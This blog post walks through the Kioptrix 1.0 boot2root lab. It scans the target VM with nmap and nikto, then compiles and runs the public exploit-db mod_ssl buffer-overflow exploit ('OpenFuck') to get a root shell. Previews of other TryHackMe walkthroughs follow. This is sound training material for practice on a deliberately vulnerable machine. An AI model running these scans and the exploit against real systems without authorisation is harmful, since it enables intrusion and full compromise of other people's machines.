Kioptrix 1.0 (Level 1) Walkthrough

Introduction

Today we're going to do a boot2root pentest walkthrough of the Kioptrix 1.0 (Level 1) machine created by the Kioptrix team and hosted at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ .

For this pentest we'll be using two virtual machines, a Kali Linux machine as our attacking system, and the Kioptrix 1.0 machine as our target system.

Locating the Target

After booting up both of our machines, the first thing we need to do is locate the target system on our network.  We can do that by running netdiscover with our attacking system.

netdiscover -r 10.0.2.0/24


Our target system's IP address is 10.0.2.5.

Scanning and Enumeration

We can determine open ports on the target with nmap.

nmap -T4 -p- 10.0.2.5


There are a lot of open ports here. We'll plug these ports into another nmap scan to get more information about them.

nmap -T4 -A -p22,80,111,139,443,32768 10.0.2.5


One notable finding here is that https running on the target on port 443. That's something we'll have to check out. Next, we'll run Nikto against the web servers.

nikto -h 10.0.2.5


There seems to be a serious vulnerability with the target's mod_ssl service. After a bit of research we find this exploit on exploit-db.com.

https://www.exploit-db.com/exploits/47080


 Finding a Way In / Privilege Escalation

According to the exploit documentation, this exploit will open a shell on the target system and give us root privileges. That sounds pretty good, so let's use it. The first step is to download the exploit by clicking the button to the right of the Exploit text in the screenshot above.


These instructions are located below the portion of the webpage screenshotted above. Looks like we need to install libssl-dev, then use gcc to compile the exploit.

cd /root/Downloads/
apt-get install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto


Now to run the exploit. After looking at the exploit's options, we enter the target system's info and run the exploit.

./OpenFuck
./OpenFuck 0x6b 10.0.2.5 443 -c 50
whoami


The exploit worked, and opened up a root shell for us. We take a quick look in the /root/ directory for a flag file, but don't find one. The bootup login screen for the Kioptrix machine states that the goal is to get root access and didn't mention a flag, so we'll call this one done.

Summary

After our initial scans, we found that the mod_ssl service running on port 443 of the target system was vulnerable to a buffer overflow exploit. Once exploited, the target system opened up a remote shell to our attacking system with root privileges.

Finish




















Comments

Post a Comment

Popular posts from this blog

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more